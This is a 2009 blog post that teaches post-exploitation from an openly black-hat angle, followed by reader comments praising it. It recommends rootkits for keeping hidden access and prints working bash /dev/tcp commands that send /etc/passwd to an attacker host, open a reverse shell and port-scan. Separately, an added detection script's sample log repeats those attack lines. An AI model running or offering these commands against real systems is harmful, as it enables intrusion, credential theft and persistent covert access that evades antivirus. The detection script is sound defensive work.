Tuesday, January 27, 2009

Post Exploitation...

One of my friends asked: "The scenario is that you have got an interactive shell on a remote machine (Linux/Windows) with admin privileges (not semi-interactive like c99, r57 etc., i.e. suppose you have got the command prompt / console)."

Now what do you think you would be doing as "POST EXPLOITATION" to have complete control over the server?

As per his request, my answer is from a black hat perspective...

After getting access to any victim machine, the most important thing is to maintain access, and a hacker should do all things necessary to maintain it.

I heard a comment from someone that he would install some service like VNC. Of course, this is a lame answer in my opinion. But it draws attention to a basic point: should we install a different backdoor? I would rather suggest using an existing service as the backdoor instead of creating a new one, because at this point we have to consider the fact that there would normally be a firewall between the attacker and the victim. So creating a new backdoor might not be useful if the firewall does not allow that service to accept connections. Anyway, installing a new backdoor means more files transferred to the victim, and therefore more chances of getting detected.

If one wants to use a backdoor, then it should of course be used together with a rootkit.
E.g.
Windows rootkit, e.g. AFX Windows Rootkit: this rootkit will hide processes, files, folders, registry keys and netstat entries on Windows 95/98/ME/NT/2k/XP/2003.

Linux rootkits: I am not giving a particular example; there are lots which hide processes, files, etc.

Using built-in Linux tools instead of external backdoors
For Linux I would rather use the built-in tools to do things for me.
The most important reason for this is "No external tool means nothing for antivirus to detect" B-)

On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
Ex.
Victim>echo "Hello WOrld" > /dev/tcp/10.10.10.66/2345

Attacker>nc -l -p 2345
Hello WOrld

Not impressed? Then look at this:

Victim>cat /etc/passwd > /dev/tcp/10.10.10.66/2345

Attacker>nc -l -p 2345
root:x:0:0:root:/root:bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
...
...

A file transferred without even using nc on the victim.

OK, so file transfer can be done. What else do I want to do on my rooted box?
Have a backdoor shell, scan for other machines. Can we do that without external tools???
...
...

Of course we can
...
How??
Linux /dev/tcp .... is the key

Victim$>/bin/bash -i > /dev/tcp/10.10.10.66/2345 0<&1 2>&1

Attacker>nc -l -p 2345
victim@linux:~$whoami
user12

Now port scanning...
You guessed correctly: /dev/tcp :D

$ echo > /dev/tcp/10.10.10.66/25
bash: connect: Connection Refused
bash: /dev/tcp/10.10.10.66/25: Connection refused

$ echo > /dev/tcp/10.10.10.66/80
$ #Command successful means port 80 is listening
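
Seen from the defending side, every /dev/tcp use above leaves the same recognisable string in whatever records shell command lines. The following is an added example, not part of the original post: a POSIX shell scanner that pulls protocol, host and port out of such lines and counts distinct ports per host, which is what the echo-based port check looks like when it is repeated. The sample lines, the function names and the /usr/share/doc path are constructed for illustration; 10.10.10.66 is the address used in the post.

```shell
#!/bin/sh
# Added example (not from the original post): find bash /dev/tcp and /dev/udp
# redirections in logged command lines and report where they point.

# A redirection operator followed by the pseudo-path /dev/{tcp,udp}/HOST/PORT.
# PORT may be a number, a service name or a shell variable.
DEVNET_RE='[<>]&?[ \t]*/dev/(tcp|udp)/[^/ \t]+/[A-Za-z0-9_${}-]+'

# find_devnet: read command lines on stdin, print "LINE PROTO HOST PORT" per hit.
find_devnet() {
    awk -v re="$DEVNET_RE" '{
        line = $0
        while (match(line, re)) {
            hit = substr(line, RSTART, RLENGTH)
            sub(/^[<>]&?[ \t]*/, "", hit)   # drop the redirection operator
            split(hit, p, "/")              # "", "dev", proto, host, port
            print NR, p[3], p[4], p[5]
            line = substr(line, RSTART + RLENGTH)
        }
    }'
}

# port_fanout: number of distinct ports contacted per host. One shell touching
# many ports on one host is the pattern left by the echo-based port check.
port_fanout() {
    find_devnet | awk '
        { key = $3 SUBSEP $4 }
        !(key in seen) { seen[key] = 1; ports[$3]++ }
        END { for (h in ports) print h, ports[h] }' | sort
}

# Constructed sample: command lines as they could appear in shell history or
# in logged `bash -c` arguments. Lines 4 and 7 are benign and must not match.
sample_log() {
    cat <<'EOF'
ls -l /var/log
echo "Hello WOrld" > /dev/tcp/10.10.10.66/2345
cat /etc/passwd > /dev/tcp/10.10.10.66/2345
grep -r /dev/tcp/ /usr/share/doc/bash
/bin/bash -i > /dev/tcp/10.10.10.66/2345 0<&1 2>&1
echo > /dev/tcp/10.10.10.66/80
tar czf /tmp/backup.tgz /home > /dev/null
EOF
}

sample_log | find_devnet
sample_log | port_fanout
```

Because bash resolves these paths itself, there is no /dev/tcp file to put a file watch on, and a redirection typed at a prompt is not part of any child process's arguments. Shell history, terminal logging, script contents and `bash -c` strings are where the pattern shows up, alongside network telemetry in which bash itself is the connecting process.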


These are just some examples; you can go ahead with your own tricks... So this concludes some of the things (only some of the things.. ;) ) I would do post exploitation.

2 comments:

Anonymous said...

Impressive.

The best part I liked is the /dev/tcp stuff.
Never saw this beauty of Linux.

Bro, plz post more on these tricks.


b0nd

Anonymous said...

Great Neo

Punter